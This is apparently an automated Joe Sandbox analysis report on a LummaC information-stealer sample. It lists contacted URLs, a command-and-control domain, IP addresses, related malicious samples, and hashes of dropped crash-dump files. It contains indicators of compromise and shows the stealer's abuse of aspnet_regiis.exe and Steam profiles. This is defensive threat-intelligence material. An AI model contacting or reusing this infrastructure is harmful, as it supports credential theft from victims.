                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&aaspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://lev-tolstoi.com/apidows6$aspnet_regiis.exe, 00000002.00000002.2310023537.0000000002BC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://store.steampowered.com/steam_refunds/aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://x1.c.lencr.org/0aspnet_regiis.exe, 00000002.00000003.1966091168.0000000005003000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://x1.i.lencr.org/0aspnet_regiis.exe, 00000002.00000003.1966091168.0000000005003000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installaspnet_regiis.exe, 00000002.00000003.1866624782.0000000005010000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchaspnet_regiis.exe, 00000002.00000003.1866856303.000000000500F000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1867108494.0000000004FF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aaspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=easpnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=kOc26QwM0vlX&l=easpnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://steamcommunity.com/workshop/aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://support.mozilla.org/products/firefoxgro.allaspnet_regiis.exe, 00000002.00000003.1967836712.000000000510B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_caspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://store.steampowered.com/legal/aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=enaspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=engaspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://steamcommunity.com:443/profiles/76561199724331900daspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://lev-tolstoi.com/9aspnet_regiis.exe, 00000002.00000002.2310585702.0000000004FE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgaspnet_regiis.exe, 00000002.00000003.1968573576.0000000002C3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoaspnet_regiis.exe, 00000002.00000003.1866856303.000000000500F000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1867108494.0000000004FF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&aaspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=englaspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://lev-tolstoi.com/apiHaspnet_regiis.exe, 00000002.00000003.2034108887.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2049691966.0000000002BBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                              unknown
                                                                                                                                                                                              http://upx.sf.netAmcache.hve.8.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://store.steampowered.com/aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.pngaspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgaspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gifaspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                        172.67.157.254
                                                                                                                                                                                                        lev-tolstoi.comUnited States
                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        23.55.153.106
                                                                                                                                                                                                        steamcommunity.comUnited States
                                                                                                                                                                                                        20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                        Analysis ID:1577513
                                                                                                                                                                                                        Start date and time:2024-12-18 14:45:42 +01:00
                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                        Overall analysis duration:0h 6m 29s
                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                        Number of analysed new started processes analysed:10
                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                        Sample name:Armanivenntii_crypted_EASY.exe
                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@5/7@11/2
                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                        • Successful, ratio: 83%
                                                                                                                                                                                                        • Number of executed functions: 41
                                                                                                                                                                                                        • Number of non-executed functions: 53
                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 20.42.73.29, 172.202.163.200, 20.190.177.82, 13.107.246.63
                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                        • VT rate limit hit for: Armanivenntii_crypted_EASY.exe
                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                        08:46:36API Interceptor13x Sleep call for process: aspnet_regiis.exe modified
                                                                                                                                                                                                        08:47:37API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        172.67.157.254aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            v_dolg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                              random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                alexshlu.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                  ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    https://t.co/nq9BYOxCg9Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                      23.55.153.106aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          zq6a1iqg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                            v_dolg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                              cccc2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                CompleteStudio.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                    alexshlu.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      99awhy8l.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        5_6253708004881862888.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                          lev-tolstoi.comaqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 172.67.157.254
                                                                                                                                                                                                                                          aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 172.67.157.254
                                                                                                                                                                                                                                          v_dolg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                          • 172.67.157.254
                                                                                                                                                                                                                                          CompleteStudio.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 104.21.66.86
                                                                                                                                                                                                                                          random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                          • 172.67.157.254
                                                                                                                                                                                                                                          alexshlu.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                          • 172.67.157.254
                                                                                                                                                                                                                                          5_6253708004881862888.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 104.21.66.86
                                                                                                                                                                                                                                          1fxm3u0d.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 104.21.66.86
                                                                                                                                                                                                                                          2kudv4ea.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 104.21.66.86
                                                                                                                                                                                                                                          ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 104.21.66.86
                                                                                                                                                                                                                                          steamcommunity.comaqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                          aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                          zq6a1iqg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                          v_dolg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                          cccc2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                          CompleteStudio.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                          random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                          alexshlu.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                          99awhy8l.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                          5_6253708004881862888.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                          AKAMAI-ASN1EUaqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                          aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                          http://www.mynylgbs.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 23.195.38.175
                                                                                                                                                                                                                                          loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                          • 96.17.102.118
                                                                                                                                                                                                                                          zq6a1iqg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                          v_dolg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                          cccc2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                          CompleteStudio.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                          random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                          alexshlu.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                          CLOUDFLARENETUSrandom.exe.2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 104.21.64.80
                                                                                                                                                                                                                                          aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 172.67.157.254
                                                                                                                                                                                                                                          aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 172.67.157.254
                                                                                                                                                                                                                                          https://pluginvest.freshdesk.com/en/support/solutions/articles/157000010678-pluginvest-laadoplossingGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 162.159.140.147
                                                                                                                                                                                                                                          goldlummaa.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 104.21.50.161
                                                                                                                                                                                                                                          hnsjdghf18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                                          ko.ps1.2.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 172.64.41.3
                                                                                                                                                                                                                                          kjshdgacg18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                          • 104.21.23.76
                                                                                                                                                                                                                                          InstallSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 172.67.220.223
                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                          a0e9f5d64349fb13191bc781f81f42e1random.exe.2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 172.67.157.254
                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                          aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 172.67.157.254
                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                          aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 172.67.157.254
                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                          goldlummaa.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 172.67.157.254
                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                          • 172.67.157.254
                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                          InstallSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 172.67.157.254
                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                          ScreenUpdateSync.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 172.67.157.254
                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                          random.exe.10.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 172.67.157.254
                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                          zq6a1iqg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                          • 172.67.157.254
                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                          v_dolg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                          • 172.67.157.254
                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                          No context
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                                                          Entropy (8bit):1.018995465917928
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:192:OqhP1vocjWj/0BU/4jo05xzuiF1Z24IO8C:T7AcjWjsBU/4jZzuiF1Y4IO8C
                                                                                                                                                                                                                                          MD5:2C6CE64CFC62712CFBBCFA9E6CE76FCB
                                                                                                                                                                                                                                          SHA1:5742467786EAD210E61A1A782C5BE549496A3B9F
                                                                                                                                                                                                                                          SHA-256:0B92B08349CD1394B184FDFC6B36F95EB1D8CED806E6BFEF93696B80D46F4525
                                                                                                                                                                                                                                          SHA-512:81B6DAF33428CCAF27A015AD8CB16B44608D3E9A8FCD13F433E065ADDD6895398D685726A147536D40740F54652F9A002D19AEC451FF00B99BBA6C2CA24A9E19
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.0.0.3.2.3.6.2.0.0.5.2.7.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.0.0.3.2.3.6.9.1.9.2.6.4.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.0.a.4.b.1.1.1.-.a.5.d.1.-.4.8.c.1.-.9.b.a.0.-.d.d.f.6.c.d.4.4.a.a.0.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.b.3.1.4.7.e.7.-.b.9.c.4.-.4.f.1.4.-.a.b.6.2.-.c.9.f.e.5.2.2.5.0.5.3.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.a.s.p.n.e.t._.r.e.g.i.i.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.a.s.p.n.e.t._.r.e.g.i.i.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.f.0.-.0.0.0.1.-.0.0.1.4.-.b.9.f.5.-.4.d.4.1.5.3.5.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.c.5.5.8.f.0.e.8.4.2.c.4.3.e.6.b.3.b.c.0.6.6.9.1.6.b.2.
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          File Type:Mini DuMP crash report, 15 streams, Wed Dec 18 13:47:16 2024, 0x1205a4 type
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):108930
                                                                                                                                                                                                                                          Entropy (8bit):2.0059889879875312
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:384:jEAgn6yhIStG4s3Suwcp3msOzv0QBTv25uQuOT5dyuD:IXbtG4siuwyKBTmuOy+
                                                                                                                                                                                                                                          MD5:1FB7E1E2E54F13AF27F6731976873501
                                                                                                                                                                                                                                          SHA1:0E1C93648356054565F4190ABB3546A21DD1AC1E
                                                                                                                                                                                                                                          SHA-256:4461B45852ED5ED89249A7C732A4CE39E4F4A0F39C68D09FB6DF03A2D7A1040A
                                                                                                                                                                                                                                          SHA-512:35C2FB26DCEEDDA12874652777E59F66C5BE2032518BCF8823E172D55E45E4B4CA9FAD14FF1BA13FEE3E2470742AB3983FEE08F675B27B1464C972CF474F1FB4
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Preview:MDMP..a..... .......d.bg........................|...............D!...........J..........`.......8...........T............>...j..........X"..........D$..............................................................................eJ.......$......GenuineIntel............T...........;.bg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):8324
                                                                                                                                                                                                                                          Entropy (8bit):3.6894486037401375
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJjN6jyw6YSX6QTgmfCklxpr089b6ksfZem:R6lXJp6mw6Ya60gmfCklt6XfZ
                                                                                                                                                                                                                                          MD5:AA3EBA585F230F52176FFA7F65057C40
                                                                                                                                                                                                                                          SHA1:563C0E347C4B0186764DFEB46518811726C0F925
